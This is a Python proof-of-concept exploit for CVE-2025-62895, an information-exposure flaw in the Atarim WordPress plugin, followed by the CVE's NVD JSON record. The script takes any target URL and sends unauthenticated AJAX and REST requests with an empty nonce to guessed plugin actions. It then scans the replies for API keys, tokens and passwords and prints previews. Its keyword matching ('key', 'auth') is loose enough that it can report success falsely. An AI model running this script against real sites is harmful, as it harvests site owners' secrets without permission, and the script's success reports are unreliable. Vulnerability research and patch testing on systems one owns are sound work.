CVE-2025-62895

# CVE-2025-62895 PoC - Atarim Plugin Sensitive Information Exposure # Affected Version: <= 4.2.1 # CVSS: 5.3 (Medium) import requests import json import sys def exploit_atarim_sensitive_data(target_url): """ Exploit for CVE-2025-62895: Atarim Visual Collaboration Sensitive Data Exposure This PoC demonstrates how to retrieve embedded sensitive data from Atarim plugin. """ print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2025-62895...") # Common Atarim AJAX endpoints endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/atarim/v1/", "/?rest_route=/atarim/v1/" ] # Sensitive data retrieval parameters (identified from plugin code) sensitive_params = [ {"action": "atarim_get_config", "data": {"type": "all"}}, {"action": "atarim_get_data", "data": {"resource_id": "*"}}, {"endpoint": "config", "method": "GET"}, {"endpoint": "settings", "method": "GET"} ] results = [] for endpoint in endpoints: for param in sensitive_params: try: url = target_url.rstrip('/') + endpoint if "action" in param: # AJAX request exploitation data = { "action": param["action"], "nonce": "" # Missing or weak nonce validation } if "data" in param: data.update(param["data"]) response = requests.post(url, data=data, timeout=10) else: # REST API exploitation api_url = url + param["endpoint"] response = requests.get(api_url, timeout=10) # Check for sensitive data in response if response.status_code == 200: content = response.text sensitive_keywords = ["api_key", "secret", "token", "password", "credential", "auth", "key", "private"] for keyword in sensitive_keywords: if keyword.lower() in content.lower(): results.append({ "endpoint": endpoint, "param": param, "status": response.status_code, "sensitive_found": keyword, "response_preview": content[:500] }) print(f"[!] Sensitive data detected: {keyword}") print(f"[!] Endpoint: {endpoint}") print(f"[>] Response preview: {content[:200]}...") except requests.RequestException as e: print(f"[-] Request failed: {e}") continue if results: print(f"\n[+] Successfully exploited CVE-2025-62895!") print(f"[+] Found {len(results)} instances of sensitive data exposure") return results else: print(f"[-] No sensitive data found (target may be patched)") return None if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-62895_poc.py <target_url>") print("Example: python cve-2025-62895_poc.py http://example.com") sys.exit(1) target = sys.argv[1] exploit_atarim_sensitive_data(target)

{"cve": {"id": "CVE-2025-62895", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:48.537", "lastModified": "2026-04-27T18:16:28.037", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in Vito Peleg Atarim atarim-visual-collaboration allows Retrieve Embedded Sensitive Data.This issue affects Atarim: from n/a through <= 4.2.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/atarim-visual-collaboration/vulnerability/wordpress-atarim-plugin-4-2-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}